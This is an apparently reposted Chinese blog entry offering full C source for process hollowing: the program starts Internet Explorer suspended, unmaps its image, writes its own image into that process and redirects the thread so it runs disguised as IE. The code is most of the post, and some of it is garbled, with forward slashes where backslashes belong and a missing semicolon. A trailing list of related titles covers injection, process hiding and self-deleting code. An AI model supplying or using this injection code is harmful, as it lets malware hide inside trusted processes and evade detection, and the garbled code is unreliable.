把自己插入到IE进程中
来源:互联网 发布:路由器mac地址改不了 编辑:程序博客网 时间:2024/05/02 05:06
把自己插入到IE进程中,用TCB启动自己,随便写的垃圾代码,参考了老V的代码,高手莫笑
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ntdll.lib")
typedef long NTSTATUS;
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
HANDLE ProcessHandle,
PVOID BaseAddress
);
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress;
DWORD dwReserve;
} CHILDPROCESS;
char szIePath[MAX_PATH];
BOOL FindIePath(char *IePath,int *dwBuffSize);
BOOL InjectProcess(void);
DWORD GetSelfImageSize(HMODULE hModule);
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
);
int main(void)
{
if (InjectProcess() )
{
printf("This is my a test code,made by shadow3./r/n");
}
else
{
MessageBox(NULL,"进程插入完成","Text",MB_OK);
}
return 0;
}
BOOL FindIePath(char *IePath,int *dwBuffSize)
{
char szSystemDir[MAX_PATH];
GetSystemDirectory(szSystemDir,MAX_PATH);
szSystemDir[2] = '/0'
lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe");
lstrcpy(IePath, szSystemDir);
return TRUE;
}
BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0;
STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;
HMODULE hModule = NULL;
ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH);
GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL);
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE;
}
hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
return FALSE;
}
pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
dwImageSize = GetSelfImageSize(hModule);
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) )
{
printf("CHILD PID: [%d]/r/n",pi.dwProcessId);
if ( ZwUnmapViewOfSection(
pi.hProcess,
(LPVOID)stChildProcess.dwBaseAddress
) == 0 )
{
lpVirtual = VirtualAllocEx(
pi.hProcess,
(LPVOID)hModule,
dwImageSize,
MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE
);
if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success./r/n");
}
}
else
{
printf("ZwUnmapViewOfSection() failed./r/n");
return TRUE;
}
if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx;
// 重写装载地址
WriteProcessMemory(
pi.hProcess,
&PPEB[2],
&lpVirtual,
sizeof(DWORD),
&dwWrite
);
if ( WriteProcessMemory(
pi.hProcess,
lpVirtual,
hModule,
dwImageSize,
&dwWrite) )
{
printf("image inject into process success./r/n");
ThreadCxt.ContextFlags = CONTEXT_FULL;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
#ifdef DEBUG
printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax);
printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx);
printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx);
printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx);
printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip);
#endif
SetThreadContext(pi.hThread, &ThreadCxt);
ResumeThread(pi.hThread);
}
else
{
printf("WirteMemory Failed,code:%d/r/n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
else
{
printf("VirtualMemory Failed,code:%d/r/n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
return TRUE;
}
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;
_asm
{
mov ecx,0x30
mov eax, fs:[ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x0c]
add esi,0x20
lodsd
mov dwImageSize,eax
}
return dwImageSize;
}
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)
{
STARTUPINFO si = {0};
DWORD *PPEB;
DWORD read;
// 使用挂起模式启动ie
if( CreateProcess(
NULL,
szIePath,
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
pi
) )
{
pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);
PPEB = (DWORD *)pThreadCxt->Ebx;
// 得到ie的装载基地址
ReadProcessMemory(
pi->hProcess,
&PPEB[2],
(LPVOID)&(pChildProcess->dwBaseAddress),
sizeof(DWORD),
&read
);
return TRUE ;
}
return FALSE;
}
- 把自己插入到IE进程中
- 插入自己到IE进程
- 插入自己到IE进程
- 把自身插入到IE进程里的代码
- 把自身插入到IE进程里的代码
- 从文件中把数据插入到数据库中
- 利用matlab把向量b插入到a中
- 集合(3)把一个集合插入到另一个集合中
- 如何把GRETA加入到自己的项目中
- 把自己的应用程序加载到uClinux中运行
- 如何把GRETA加入到自己的项目中
- 把自己的应用程序加载到uClinux中运行
- 把Google地图嵌入到自己的网页中
- 如何把搜索引擎添加到自己的网页中
- 如何把自己的网站加入到浏览器搜索引擎中
- 如何把自己的模块编译到内核中
- 把exe嵌入到自己的exe中。delphi xe3
- 把自己的jar,添加到jre中
- WindowsCE下Unicode和Ansi字符间互相转换的函数
- 远程教育课件资源管理条例大纲初稿
- 编程规范-程序员们都应该这样写代码
- 远线程删除自身(来自SWAN)
- Csdn Blog模板CSS代码(5):蓝色海洋
- 把自己插入到IE进程中
- IT精英们常犯的十大傻事
- 暴力”注入Explorer
- VC++.NET 2005 几个比较难缠的问题及其解决方法
- 利用批处理过滤任意字符
- Windows2000 内核级进程隐藏、侦测技术
- 美国Arkon写的自杀代码
- Hook And Inject 系列教程 7.12 update
- 项目经理是怎么当的?